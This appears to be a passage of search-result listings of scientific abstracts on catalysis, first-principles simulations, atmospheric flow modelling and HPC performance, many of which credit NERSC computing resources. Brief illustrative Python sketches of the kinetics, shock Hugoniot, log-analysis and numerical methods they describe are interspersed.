    He, Jiayue; Zhao, Chen; Mei, Donghai

    2014-01-01

    A novel route for cleaving the C-O aryl ether bonds of p-substituted H-, CH3-, and OH- diphenyl ethers has been explored over Ni/SiO2 catalysts under very mild conditions. The C-O bond of diphenyl ether is cleaved by parallel hydrogenolysis and hydrolysis (hydrogenolysis combined with HO* addition) on Ni. The rates as a function of H2 pressure from 0 to 10 MPa indicate that the rate-determining step is the C-O bond cleavage on Ni. H* atoms compete with the organic reactant for adsorption, leading to a maximum in the rate with increasing H2 pressure. In contrast to diphenyl ether, hydrogenolysis is the exclusive route for cleaving an ether C-O bond of di-p-tolyl ether to form p-cresol and toluene. 4,4'-Dihydroxydiphenyl ether undergoes sequential surface hydrogenolysis, first to phenol and HOC6H4O* (adsorbed), which is then cleaved to phenol (C6H5O* with added H*) and H2O (O* with two added H*) in a second step. Density functional theory supports the operation of this pathway. Notably, addition of H* to HOC6H4O* is less favorable than a further hydrogenolytic C-O bond cleavage. The TOFs of the three aryl ethers with Ni/SiO2 in water followed the order 4,4'-dihydroxydiphenyl ether (69 h⁻¹) > diphenyl ether (26 h⁻¹) > di-p-tolyl ether (1.3 h⁻¹), in line with the increasing apparent activation energies, ranging from 93 kJ·mol⁻¹ (4,4'-dihydroxydiphenyl ether) through 98 kJ·mol⁻¹ (diphenyl ether) to 105 kJ·mol⁻¹ (di-p-tolyl ether). D.M. thanks the support from the US Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). 
EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE’s Office of Biological and Environmental Research.
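    The rate maximum with increasing H2 pressure described above is the signature of competitive Langmuir-Hinshelwood kinetics. A toy numerical sketch shows the non-monotonic behavior; the rate expression and all constants below are illustrative assumptions, not fitted to the reported data:

    ```python
    import numpy as np

    # Hypothetical competitive Langmuir-Hinshelwood rate law: dissociatively
    # adsorbed H* competes with the aryl ether (A) for Ni surface sites.
    K_A_C_A = 1.0      # adsorption term for the organic reactant (dimensionless, illustrative)
    K_H = 2.0          # H2 adsorption equilibrium constant (1/MPa, illustrative)

    def rate(p_h2):
        h = np.sqrt(K_H * p_h2)                        # H* coverage term (dissociative)
        return K_A_C_A * h / (1.0 + K_A_C_A + h) ** 2  # competing site occupancy

    p = np.linspace(0.01, 10.0, 1000)                  # H2 pressure sweep, MPa
    p_max = p[rate(p).argmax()]
    print(round(p_max, 2))   # rate peaks at an intermediate pressure, then declines
    ```

    At low pressure the rate rises with H* coverage; at high pressure H* crowds the reactant off the surface, so the rate falls, reproducing the observed maximum.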

  19. First-principles Study of Phenol Hydrogenation on Pt and Ni Catalysts in Aqueous Phase

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Yoon, Yeohoon; Rousseau, Roger J.; Weber, Robert S.

    2014-07-23

    The effects of the aqueous phase on the reactivity of phenol hydrogenation over Pt and Ni catalysts were investigated using density functional theory based ab initio molecular dynamics (AIMD) calculations. The adsorption of phenol and the first hydrogenation steps via the three carbon positions (ortho, meta and para) with respect to the phenolic OH group were studied in both vacuum and liquid-phase conditions. To gain insight into how the aqueous phase affects the metal catalyst surface, water environments of increasing size, including a singly adsorbed water molecule, a monolayer (9 water molecules), a double layer (24 water molecules), and bulk liquid water (52 water molecules) on the Pt(111) and Ni(111) surfaces, were modeled. Compared to the vacuum/metal interfaces, AIMD simulation results suggest that the aqueous Pt(111) and Ni(111) interfaces have a metal work function lower by about 0.8 - 0.9 eV, thus making the metals in the aqueous phase stronger reducing agents and poorer oxidizing agents. Phenol adsorption from the aqueous phase is found to be slightly weaker than from the vapor phase. The first hydrogenation step of phenol at the ortho position of the phenolic ring is slightly favored over the other two positions. The polarization induced by the surrounding water molecules and the solvation effect play important roles in stabilizing the transition states associated with phenol hydrogenation, lowering the barriers by 0.1 - 0.4 eV. The detailed discussion of the interfacial electrostatics in the current study is very useful for understanding the nature of a broader class of metal-catalyzed reactions in the liquid solution phase. This work was supported by the US Department of Energy (DOE), Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences & Biosciences and Office of Energy Efficiency and Renewable Energy. Pacific Northwest National Laboratory (PNNL) is a multiprogram national laboratory operated for DOE by Battelle. 
Computing time was granted by the grand challenge of computational catalysis of the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) and by the National Energy Research Scientific Computing Center (NERSC). EMSL is a national scientific user facility located at Pacific Northwest National Laboratory (PNNL) and sponsored by DOE’s Office of Biological and Environmental Research.

  20. Hydraulic Jumps, Waves and Other Flow Features Found by Modeling Stably-Stratified Flows in the Salt Lake Valley

    NASA Astrophysics Data System (ADS)

    Chen, Y.; Ludwig, F.; Street, R.

    2003-12-01

    The Advanced Regional Prediction System (ARPS) was used to simulate weak synoptic wind conditions with stable stratification and pronounced drainage flow at night in the vicinity of the Jordan Narrows at the south end of Salt Lake Valley. The simulations showed the flow to be quite complex, with hydraulic jumps and internal waves that make it essential to use a complete treatment of the fluid dynamics. Six one-way nested grids were used to resolve the topography; they ranged from 20-km grid spacing (initialized from Eta 40-km operational analyses) down to 250-m horizontal resolution, with 200 vertically stretched levels extending to a height of 20 km and beginning with a 10-m cell at the surface. Most of the features of interest resulted from interactions with local terrain features, so little was lost by using one-way nesting. Canyon, gap, and over-terrain flows have a large effect on mixing and vertical transport, especially in regions where hydraulic jumps are likely. Our results also showed that the effect of spatial resolution on simulation performance is profound. The horizontal resolution must be such that the smallest features likely to have an important impact on the flow are spanned by at least a few grid points. Thus, the 250-m minimum resolution of this study is appropriate for treating the effects of features of about 1 km or greater extent. To be consistent, the vertical cell dimension must resolve the same terrain features resolved by the horizontal grid. These simulations show that many of the interesting flow features produce observable wind and temperature gradients at or near the surface. Accordingly, some relatively simple field measurements might be made to confirm that the simulated mixing phenomena actually take place in the real atmosphere, which would be very valuable for planning large, expensive field campaigns. The work was supported by the Atmospheric Sciences Program, Office of Biological and Environmental Research, U.S. 
Department of Energy. The National Energy Research Scientific Computing Center (NERSC) provided computational time. We thank Professor Ming Xue and others at the University of Oklahoma for their help.

  1. Investigating the significance of zero-point motion in small molecular clusters of sulphuric acid and water

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Stinson, Jake L.; Kathmann, Shawn M.; Ford, Ian J.

    2014-01-14

    The nucleation of particles from trace gases in the atmosphere is an important source of cloud condensation nuclei (CCN), and these are vital for the formation of clouds in view of the high supersaturations required for homogeneous water droplet nucleation. The methods of quantum chemistry have increasingly been employed to model nucleation due to their high accuracy and efficiency in calculating configurational energies, and nucleation rates can be obtained from the associated free energies of particle formation. However, even in such advanced approaches, it is typically assumed that the nuclei have a classical nature, which is questionable for some systems. The importance of zero-point motion (also known as quantum nuclear dynamics) in modelling small clusters of sulphuric acid and water is tested here using the path integral molecular dynamics (PIMD) method at the density functional theory (DFT) level of theory. We observe a small zero-point effect on the equilibrium structures of certain clusters. One configuration is found to display a bimodal behaviour at 300 K, in contrast to the stable ionised state suggested by a zero-temperature classical geometry optimisation. The general effect of zero-point motion is to promote the extent of proton transfer with respect to classical behaviour. We thank Prof. Angelos Michaelides and his group at University College London (UCL) for practical advice and helpful discussions. This work benefited from interactions with the Thomas Young Centre through seminars and discussions involving the PIMD method. SMK was supported by the U.S. Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences. JLS and IJF were supported by the IMPACT scheme at UCL and by the U.S. Department of Energy, Office of Basic Energy Sciences, Division of Chemical Sciences, Geosciences, and Biosciences. 
We are grateful for use of the UCL Legion High Performance Computing Facility and the resources of the National Energy Research Scientific Computing Center (NERSC), which is supported by the Office of Science of the U.S. Department of Energy under Contract No. DE-AC02-05CH11231.

  2. Soft Functionals for Hard Matter

    NASA Astrophysics Data System (ADS)

    Cooper, Valentino R.; Yuk, Simuck F.; Krogel, Jaron T.

    Theory and computation are critical to the materials discovery process. While density functional theory (DFT) has become the standard for predicting materials properties, it is often plagued by inaccuracies in the underlying exchange-correlation functionals. Using high-throughput DFT calculations we explore the accuracy of various exchange-correlation functionals for modeling the structural and thermodynamic properties of a wide range of complex oxides. In particular, we examine the feasibility of using the nonlocal van der Waals density correlation functional with C09 exchange (C09x), which was designed for sparsely packed soft matter, for investigating the properties of hard matter like bulk oxides. Preliminary results show unprecedented performance for some prototypical bulk ferroelectrics, which can be correlated with similarities between C09x and PBEsol. This effort lays the groundwork for understanding how these soft functionals can be employed as general purpose functionals for studying a wide range of materials where strong internal bonds and nonlocal interactions coexist. Research was sponsored by the US DOE, Office of Science, BES, MSED and Early Career Research Programs and used resources at NERSC.

  3. First-Principles Equation of State and Shock Compression of Warm Dense Aluminum and Hydrocarbons

    NASA Astrophysics Data System (ADS)

    Driver, Kevin; Soubiran, Francois; Zhang, Shuai; Militzer, Burkhard

    2017-10-01

    Theoretical studies of warm dense plasmas are a key component of progress in fusion science, defense science, and astrophysics programs. Path integral Monte Carlo (PIMC) and density functional theory molecular dynamics (DFT-MD), two state-of-the-art, first-principles, electronic-structure simulation methods, provide a consistent description of plasmas over a wide range of density and temperature conditions. Here, we combine high-temperature PIMC data with lower-temperature DFT-MD data to compute coherent equations of state (EOS) for aluminum and hydrocarbon plasmas. Subsequently, we derive shock Hugoniot curves from these EOSs and extract the temperature-density evolution of plasma structure and ionization behavior from pair-correlation function analyses. Since PIMC and DFT-MD accurately treat effects of atomic shell structure, we find compression maxima along Hugoniot curves attributed to K-shell and L-shell ionization, which provide a benchmark for widely-used EOS tables, such as SESAME and LEOS, and more efficient models. LLNL-ABS-734424. Funding provided by the DOE (DE-SC0010517) and in part under the auspices of the U.S. Department of Energy by Lawrence Livermore National Laboratory under Contract DE-AC52-07NA27344. Computational resources provided by Blue Waters (NSF ACI1640776) and NERSC. K. Driver's and S. Zhang's current address is Lawrence Livermore Natl. Lab, Livermore, CA, 94550, USA.
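    The shock Hugoniot curves mentioned above follow from the Rankine-Hugoniot energy condition, E - E0 = 0.5*(P + P0)*(V0 - V). A sketch of solving that condition against an EOS; the analytic ideal-gas-like model and its units here are invented stand-ins for the tabulated PIMC/DFT-MD data:

    ```python
    # Toy analytic EOS standing in for tabulated first-principles data; a real
    # calculation would interpolate P(V, T) and E(V, T) from PIMC/DFT-MD tables.
    def pressure(V, T):   # illustrative model and units
        return T / V

    def energy(V, T):
        return 1.5 * T

    V0, T0 = 1.0, 0.3                          # initial (ambient) state
    P0, E0 = pressure(V0, T0), energy(V0, T0)

    def hugoniot_T(V):
        """Find T satisfying the Rankine-Hugoniot energy condition
        E - E0 = 0.5*(P + P0)*(V0 - V) at compressed volume V, by bisection."""
        f = lambda T: energy(V, T) - E0 - 0.5 * (pressure(V, T) + P0) * (V0 - V)
        lo, hi = 1e-6, 1e4
        for _ in range(80):
            mid = 0.5 * (lo + hi)
            if f(lo) * f(mid) <= 0:
                hi = mid
            else:
                lo = mid
        return 0.5 * (lo + hi)

    # Hugoniot points (V, T, P) at three compressions
    for V in (0.8, 0.5, 0.3):
        T = hugoniot_T(V)
        print(V, round(T, 3), round(pressure(V, T), 2))
    ```

    Repeating the root-find over a grid of volumes traces out the Hugoniot; compression maxima appear where the real EOS departs from this smooth toy model (e.g. at shell ionization).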

  4. Final Report for DOE Grant DE-FG02-03ER25579; Development of High-Order Accurate Interface Tracking Algorithms and Improved Constitutive Models for Problems in Continuum Mechanics with Applications to Jetting

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Puckett, Elbridge Gerry; Miller, Gregory Hale

    Much of the work conducted under the auspices of DE-FG02-03ER25579 was characterized by an exceptionally close collaboration with researchers at the Lawrence Berkeley National Laboratory (LBNL). For example, Andy Nonaka, one of Professor Miller's graduate students in the Department of Applied Science at U.C. Davis (UCD), wrote his PhD thesis in an area of interest to researchers in the Applied Numerical Algorithms Group (ANAG), which is part of the National Energy Research Scientific Computing Center (NERSC) at LBNL. Dr. Nonaka collaborated closely with these researchers and subsequently published the results of this collaboration jointly with them: one article in a peer-reviewed journal and one paper in the proceedings of a conference. Dr. Nonaka is now a research scientist in the Center for Computational Sciences and Engineering (CCSE), which is also part of NERSC at LBNL. This collaboration with researchers at LBNL also included having one of Professor Puckett's graduate students in the Graduate Group in Applied Mathematics (GGAM) at UCD, Sarah Williams, spend the summer working with Dr. Ann Almgren, a staff scientist in CCSE. As a result of this visit, Sarah decided to work on a problem suggested by the head of CCSE, Dr. John Bell, for her PhD thesis. Having finished all of the coursework and examinations required for a PhD, Sarah stayed at LBNL to work on her thesis under the guidance of Dr. Bell. Sarah finished her PhD thesis in June of 2007. Writing a PhD thesis while working at one of the University of California (UC) managed DOE laboratories is a long-established tradition at UC, and Professor Puckett has always encouraged his students to consider doing this. 
Another one of Professor Puckett's graduate students in the GGAM at UCD, Christopher Algieri, was partially supported with funds from DE-FG02-03ER25579 while he wrote his MS thesis, in which he analyzed and extended work originally published by Dr. Phillip Colella, the head of ANAG, and some of his colleagues. Chris Algieri is now employed as a staff member in Dr. Bill Collins' Climate Science Department in the Earth Sciences Division at LBNL, working with computational models of climate change. Finally, it should be noted that the work conducted by Professor Puckett and his students Sarah Williams and Chris Algieri, described in this final report for DOE grant # DE-FC02-03ER25579, is closely related to work performed by Professor Puckett and his students under the auspices of Professor Puckett's DOE SciDAC grant DE-FC02-01ER25473, An Algorithmic and Software Framework for Applied Partial Differential Equations: A DOE SciDAC Integrated Software Infrastructure Center (ISIC). Dr. Colella was the lead PI for this SciDAC grant, which comprised several research groups from DOE national laboratories and five university PIs from five different universities. In theory, Professor Puckett tried to use funds from the SciDAC grant to support work directly involved in implementing algorithms developed by members of his research group at UCD as software that might be of use to Puckett's SciDAC Co-PIs. (For example, see the work reported in Section 2.2.2 of this final report.) However, since there is considerable lead time spent developing such algorithms before they are ready to become 'software', and research plans and goals change as the research progresses, Professor Puckett supported each member of his research group partially with funds from the SciDAC APDEC ISIC DE-FC02-01ER25473 and partially with funds from this DOE MICS grant DE-FC02-03ER25579. This has necessarily resulted in a significant overlap of project areas that were funded by both grants. 
In particular, both Sarah Williams and Chris Algieri were supported partially with funds from grant # DE-FG02-03ER25579, for which this is the final report, and in part with funds from Professor Puckett's DOE SciDAC grant # DE-FC02-01ER25473. For example, Sarah Williams received support from DE-FC02-01ER25473 and DE-FC02-03ER25579, both while at UCD taking classes and writing her MS thesis and during the first year she was living in Berkeley and working at LBNL on her PhD thesis. In Chris Algieri's case, he was at UCD during the entire time he received support from both grants. More specific details of their work are included in the report.

  5. Bellerophon

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lingerfelt, Eric J; Messer, II, Otis E

    2017-01-02

    The Bellerophon software system supports CHIMERA, a production-level HPC application that simulates the evolution of core-collapse supernovae. Bellerophon enables CHIMERA's geographically dispersed team of collaborators to perform job monitoring and real-time data analysis from multiple supercomputing resources, including platforms at OLCF, NERSC, and NICS. Its multi-tier architecture provides an encapsulated, end-to-end software solution that enables the CHIMERA team to quickly and easily access highly customizable animated and static views of results from anywhere in the world via a cross-platform desktop application.

  6. Many-electron effects in the optical properties of single-walled carbon nanotubes

    NASA Astrophysics Data System (ADS)

    Spataru, Catalin D.; Ismail-Beigi, Sohrab; Capaz, Rodrigo B.; Louie, Steven G.

    2005-03-01

    Recent optical measurements on single-walled carbon nanotubes (SWCNTs) showed anomalous behaviors that are indicative of strong many-electron effects. To understand these data, we performed ab initio calculations of self-energy and electron-hole interaction (excitonic) effects on the optical spectra of several SWCNTs. We employed a many-electron Green's function approach that determines both the quasiparticle and optical excitations from first principles. We found important many-electron effects that explain many of the puzzling experimental findings in the optical spectra of these quasi-one-dimensional systems and are in excellent quantitative agreement with measurements. We have also calculated the radiative lifetime of the bright excitons in these tubes. Taking into account temperature effects and the existence of dark excitons, our results explain the radiative lifetime of excited nanotubes measured in time-resolved fluorescence experiments. This work was supported by the NSF under Grant No. DMR04-39768, and the U.S. DOE under Contract No. DE-AC03-76SF00098. Computational resources have been provided by NERSC and NPACI. RBC acknowledges financial support from the Guggenheim Foundation and Brazilian funding agencies CNPq, CAPES, FAPERJ, Instituto de Nanociências, FUJB-UFRJ and PRONEX-MCT.

  7. PATHA: Performance Analysis Tool for HPC Applications

    DOE PAGES

    Yoo, Wucherl; Koo, Michelle; Cao, Yi; ...

    2016-02-18

    Large science projects rely on complex workflows to analyze terabytes or petabytes of data. These jobs often run over thousands of CPU cores, simultaneously performing data accesses, data movements, and computation, and it is difficult to identify bottlenecks or to debug performance issues in such large workflows. To address these challenges, we have developed the Performance Analysis Tool for HPC Applications (PATHA) using state-of-the-art open-source big data processing tools. Our framework can ingest system logs to extract key performance measures and apply sophisticated statistical tools and data mining methods to the performance data. Furthermore, it utilizes an efficient data processing engine to allow users to interactively analyze a large amount of different types of logs and measurements. To illustrate the functionality of PATHA, we conduct a case study on the workflows from an astronomy project known as the Palomar Transient Factory (PTF). This study processed 1.6 TB of system logs collected on the NERSC supercomputer Edison. Using PATHA, we were able to identify performance bottlenecks that reside in three tasks of the PTF workflow and depend on the density of celestial objects.
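    The core idea, extracting per-task performance measures from logs and correlating them with workload properties, can be illustrated at toy scale with pandas; PATHA itself uses big-data engines on terabytes of logs, and the log fields and values below are invented for the example:

    ```python
    import io

    import pandas as pd

    # Toy stand-in for parsed workflow logs: one row per task execution.
    log_csv = io.StringIO("""job,task,seconds,n_objects
    1,photometry,120,5000
    1,subtraction,45,5000
    1,matching,300,5000
    2,photometry,130,9000
    2,subtraction,50,9000
    2,matching,610,9000
    """)
    df = pd.read_csv(log_csv, skipinitialspace=True)
    df["task"] = df["task"].str.strip()

    # Key performance measure: mean runtime per task across jobs.
    per_task = df.groupby("task")["seconds"].mean().sort_values(ascending=False)
    print(per_task.index[0])   # the slowest (bottleneck) task

    # Check dependency of the bottleneck on data density (number of celestial objects).
    bottleneck = df[df["task"] == per_task.index[0]]
    corr = bottleneck[["seconds", "n_objects"]].corr().iloc[0, 1]
    print(corr > 0.9)          # strong positive correlation with object density
    ```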

  8. Substrate Screening Effects in ab initio Many-body Green's Function Calculations of Doped Graphene on SiC

    NASA Astrophysics Data System (ADS)

    Vigil-Fowler, Derek; Lischner, Johannes; Louie, Steven

    2013-03-01

    Understanding many-electron interaction effects and the influence of the substrate in graphene-on-substrate systems is of great theoretical and practical interest. Thus far, both model Hamiltonian and ab initio GW calculations for the quasiparticle properties of such systems have employed crude models for the effect of the substrate, often approximating the complicated substrate dielectric matrix by a single constant. We develop a method in which the spatially-dependent dielectric matrix of the substrate (e.g., SiC) is incorporated into that of doped graphene to obtain an accurate total dielectric matrix. We present ab initio GW + cumulant expansion calculations, showing that both the cumulant expansion (to include higher-order electron correlations) and a proper account of the substrate screening are needed to achieve agreement with features seen in ARPES. We discuss how this methodology could be used in other systems. This work was supported by NSF Grant No. DMR10-1006184 and U.S. DOE Contract No. DE-AC02-05CH11231. Computational resources have been provided by the NERSC and NICS. D.V-F. acknowledges funding from the DOD's NDSEG fellowship.

  9. Interplay between Self-Assembled Structures and Energy Level Alignment of Benzenediamine on Au(111) Surfaces

    NASA Astrophysics Data System (ADS)

    Li, Guo; Neaton, Jeffrey

    2015-03-01

    Using van der Waals-corrected density functional theory (DFT) calculations, we study the adsorption of benzenediamine (BDA) molecules on Au(111) surfaces. We find that at low surface coverage, the adsorbed molecules prefer to stay isolated from each other in a monomer phase, due to inter-molecular dipole-dipole repulsion. However, when the coverage rises above a critical value of 0.9 nm⁻², the adsorbed molecules aggregate into linear structures via hydrogen bonding between amine groups, consistent with recent experiments [Haxton, Zhou, Tamblyn, et al., Phys. Rev. Lett. 111, 265701 (2013)]. Moreover, we find that these linear structures at high density considerably reduce the Au work function (relative to the monomer phase). Due to reduced surface polarization effects, we estimate that the resonance energy of the highest occupied molecular orbital of the adsorbed BDA molecule relative to the Au Fermi level is lower than in the monomer phase by more than 0.5 eV, consistent with experimental measurements [Dell'Angela, Kladnik, Cossaro, et al., Nano Lett. 10, 2470 (2010)]. This work was supported by DOE (the JCAP under Award Number DE-SC000499 and the Molecular Foundry of LBNL), and computational resources were provided by NERSC.

  10. Scaling Optimization of the SIESTA MHD Code

    NASA Astrophysics Data System (ADS)

    Seal, Sudip; Hirshman, Steven; Perumalla, Kalyan

    2013-10-01

    SIESTA is a parallel three-dimensional plasma equilibrium code capable of resolving magnetic islands at high spatial resolution in toroidal plasmas. Originally designed to exploit small-scale parallelism, SIESTA has now been scaled to execute efficiently over several thousand processors P. This scaling improvement was accomplished with minimal intrusion into the execution flow of the original version. First, the efficiency of the iterative solutions was improved by integrating the parallel block-tridiagonal solver code BCYCLIC. Krylov-space generation in GMRES was then accelerated using a customized parallel matrix-vector multiplication algorithm. Novel parallel Hessian generation algorithms were integrated, and memory access latencies were dramatically reduced through loop nest optimizations and data layout rearrangement. These optimizations sped up equilibrium calculations by factors of 30-50. It is possible to compute solutions with granularity N/P near unity on extremely fine radial meshes (N > 1024 points). Grid separation in SIESTA, which manifests itself primarily in the resonant components of the pressure far from rational surfaces, is strongly suppressed by finer meshes. Large problems of up to 300,000 simultaneous nonlinear coupled equations have been solved on the NERSC supercomputers. Work supported by U.S. DOE under Contract DE-AC05-00OR22725 with UT-Battelle, LLC.
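    BCYCLIC solves the block-tridiagonal systems in SIESTA's iterations by cyclic reduction across processors. As a minimal serial illustration of the underlying linear algebra, here is the scalar Thomas algorithm for a tridiagonal system (the block version replaces each scalar division with a small dense factorization; this sketch is an analogue, not BCYCLIC itself):

    ```python
    def thomas_solve(a, b, c, d):
        """Solve a[i]*x[i-1] + b[i]*x[i] + c[i]*x[i+1] = d[i] for a tridiagonal
        system; a[0] and c[-1] are unused. O(n) forward elimination followed
        by back substitution."""
        n = len(d)
        cp, dp = [0.0] * n, [0.0] * n
        cp[0] = c[0] / b[0]
        dp[0] = d[0] / b[0]
        for i in range(1, n):
            denom = b[i] - a[i] * cp[i - 1]
            cp[i] = c[i] / denom if i < n - 1 else 0.0
            dp[i] = (d[i] - a[i] * dp[i - 1]) / denom
        x = [0.0] * n
        x[-1] = dp[-1]
        for i in range(n - 2, -1, -1):
            x[i] = dp[i] - cp[i] * x[i + 1]
        return x

    # Example: tridiag(-1, 2, -1) system whose known solution is [1, 2, 3, 4]
    a = [0.0, -1.0, -1.0, -1.0]   # sub-diagonal (a[0] unused)
    b = [2.0, 2.0, 2.0, 2.0]      # main diagonal
    c = [-1.0, -1.0, -1.0, 0.0]   # super-diagonal (c[-1] unused)
    x = thomas_solve(a, b, c, [0.0, 0.0, 0.0, 5.0])
    ```

    The serial algorithm has a strict recurrence in i; cyclic reduction, as used in BCYCLIC, restructures it so that even- and odd-indexed rows can be eliminated concurrently across processors.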

  11. Graphics Processing Unit Acceleration of Gyrokinetic Turbulence Simulations

    NASA Astrophysics Data System (ADS)

    Hause, Benjamin; Parker, Scott; Chen, Yang

    2013-10-01

    We find a substantial increase in on-node performance using Graphics Processing Unit (GPU) acceleration in gyrokinetic delta-f particle-in-cell simulation. Optimization is performed on a two-dimensional slab gyrokinetic particle simulation using the Portland Group Fortran compiler with OpenACC compiler directives and CUDA Fortran. A mixed implementation of both OpenACC and CUDA is demonstrated; CUDA is required for optimizing the particle deposition algorithm. We have implemented the GPU acceleration on a third-generation Core i7 gaming PC with two NVIDIA GTX 680 GPUs. We find comparable, or better, acceleration relative to the NERSC DIRAC cluster with the NVIDIA Tesla C2050 computing processor. The Tesla C2050 is about 2.6 times more expensive than the GTX 580 gaming GPU. We also see enormous speedups (10× or more) on the Titan supercomputer at Oak Ridge with Kepler K20 GPUs. Results show speed-ups comparable to or better than those of OpenMP models utilizing multiple cores. The use of hybrid OpenACC, CUDA Fortran, and MPI models across many nodes will also be discussed, and optimization strategies will be presented. We will discuss progress on optimizing the comprehensive three-dimensional, general-geometry GEM code.
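    The particle deposition step singled out above is the usual obstacle for GPU ports of PIC codes: many particles scatter charge into the same grid cells, so a naive parallel loop races on the grid array, and CUDA atomics (or particle binning) are required. A serial 1D cloud-in-cell sketch of the operation, with unit-charge particles and a hypothetical setup (not the actual GEM deposition):

    ```python
    def deposit_charge(positions, n_cells, dx=1.0):
        """1D cloud-in-cell deposition: each particle's unit charge is split
        linearly between its two nearest grid nodes. Positions are assumed to
        lie in [0, n_cells*dx). The two += updates below are the scatter that
        needs atomic adds when particles are processed in parallel on a GPU."""
        grid = [0.0] * (n_cells + 1)
        for x in positions:
            i = int(x / dx)        # index of the grid node to the left
            w = x / dx - i         # fractional distance from that node
            grid[i] += 1.0 - w
            grid[i + 1] += w
        return grid

    rho = deposit_charge([0.25, 1.5, 1.5], n_cells=4)
    # Total deposited charge equals the particle count, regardless of positions
    ```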

  12. Structure, dynamics and stability of water/scCO2/mineral interfaces from ab initio molecular dynamics simulations

    DOE PAGES

    Lee, Mal-Soon; McGrail, B. Peter; Rousseau, Roger; ...

    2015-10-12

    Here, the interface between a solid and a complex multi-component liquid forms a unique reaction environment whose structure and composition can deviate significantly from either bulk phase and is poorly understood due to the innate difficulty of obtaining molecular-level information. Feldspar minerals, as typified by the Ca end-member anorthite, serve as prototypical model systems for assessing reactivity and ion mobility at solid/water-bearing supercritical fluid (WBSF) interfaces, thanks to recent X-ray based measurements that provide information on water-film formation and cation vacancies at these surfaces. Using density functional theory based molecular dynamics, which allows the evaluation of reactivity and condensed-phase dynamics on an equal footing, we report on the structure and dynamics of water nucleation and surface aggregation, carbonation, and Ca mobilization under geologic carbon sequestration scenarios (T = 323 K and P = 90 bar). We find that water has a strong enthalpic preference for aggregation on a Ca-rich, O-terminated anorthite (001) surface, but entropy strongly hinders film formation at very low water concentrations. Carbonation reactions readily occur at electron-rich terminal oxygen sites adjacent to cation vacancies when in contact with supercritical CO2. Cation vacancies of this type can form readily in the presence of a water layer that allows for facile and enthalpically favorable Ca2+ extraction and solvation. Apart from providing unprecedented molecular-level detail of a complex three-component (mineral, water and scCO2) system, this work highlights the ability of modern AIMD methods to begin to qualitatively and quantitatively address structure and reactivity at solid-liquid interfaces of high chemical complexity. This work was supported by the US Department of Energy, Office of Fossil Energy (M.-S. L., B. P. M. and V.-A. G.) and the Office of Basic Energy Science, Division of Chemical Sciences, Geosciences and Biosciences (R.R.), and performed at the Pacific Northwest National Laboratory (PNNL). PNNL is a multi-program national laboratory operated for DOE by Battelle. Computational resources were provided by PNNL's Platform for Institutional Computing (PIC); the W. R. Wiley Environmental Molecular Science Laboratory (EMSL), a national scientific user facility sponsored by the Department of Energy's Office of Biological and Environmental Research located at PNNL; and the National Energy Research Scientific Computing Center (NERSC) at Lawrence Berkeley National Laboratory.

  13. Performance Analysis Tool for HPC and Big Data Applications on Scientific Clusters

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Yoo, Wucherl; Koo, Michelle; Cao, Yu

    Big data is prevalent in HPC. Many HPC projects rely on complex workflows to analyze terabytes or petabytes of data. These workflows often run on thousands of CPU cores and perform simultaneous data accesses, data movements, and computation. It is challenging to analyze performance when the executions involve terabytes or petabytes of workflow and measurement data spread across a large number of nodes and many parallel tasks. To help identify performance bottlenecks and debug performance issues in large-scale scientific applications and scientific clusters, we have developed a performance analysis framework using state-of-the-art open-source big-data processing tools. Our tool can ingest system logs and application performance measurements to extract key performance features and apply sophisticated statistical tools and data mining methods to the performance data. It utilizes an efficient data processing engine to allow users to interactively analyze large volumes of different types of logs and measurements. To illustrate the functionality of the big data analysis framework, we conduct case studies on the workflows from an astronomy project known as the Palomar Transient Factory (PTF) and the job logs from a genome analysis scientific cluster. Our study processed many terabytes of system logs and application performance measurements collected on the HPC systems at NERSC. The implementation of our tool is generic enough to be used for analyzing the performance of other HPC systems and big-data workflows.

  14. Highly Active and Stable MgAl2O4 Supported Rh and Ir Catalysts for Methane Steam Reforming: A Combined Experimental and Theoretical Study

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mei, Donghai; Glezakou, Vassiliki Alexandra; Lebarbier, Vanessa MC

    2014-07-01

    In this work we present a combined experimental and theoretical investigation of stable MgAl2O4 spinel-supported Rh and Ir catalysts for the steam methane reforming (SMR) reaction. First, catalytic performance of a series of noble metal catalysts supported on MgAl2O4 spinel was evaluated for SMR at 600-850°C. The turnover rate at 850°C follows the order Pd > Pt > Ir > Rh > Ru > Ni. However, Rh and Ir were found to have the best combination of activity and stability for methane steam reforming in the presence of simulated biomass-derived syngas. It was found that highly dispersed ~2 nm Rh and ~1 nm Ir clusters were formed on the MgAl2O4 spinel support. Scanning Transmission Electron Microscopy (STEM) images show that excellent dispersion was maintained even under challenging high-temperature conditions (e.g. at 850°C in the presence of steam), while Ir and Rh catalysts supported on Al2O3 were observed to sinter at increased rates under the same conditions. These observations were further confirmed by ab initio molecular dynamics (AIMD) simulations, which find that ~1 nm Rh and Ir particles (50-atom clusters) bind strongly to the MgAl2O4 surfaces via a redox process leading to a strong metal-support interaction, thus helping anchor the metal clusters and reduce the tendency to sinter. Density functional theory (DFT) calculations suggest that these smaller supported Rh and Ir particles have a lower work function than larger, more bulk-like ones, which enables them to activate both water and methane more effectively, yet has minimal influence on the relative stability of coke precursors. In addition, theoretical mechanistic studies were used to probe the relationship between structure and reactivity. Consistent with the experimental observations, our theoretical modeling results also suggest that the small spinel-supported Ir particle catalyst is more active for SMR than its Rh counterpart. 
This work was financially supported by the United States Department of Energy (DOE)'s Bioenergy Technologies Office (BETO) and performed at the Pacific Northwest National Laboratory (PNNL). PNNL is a multi-program national laboratory operated for DOE by Battelle Memorial Institute. Computing time was granted by a user proposal at the Molecular Science Computing Facility in the William R. Wiley Environmental Molecular Sciences Laboratory (EMSL) located at PNNL. Part of the computational time was provided by the National Energy Research Scientific Computing Center (NERSC).

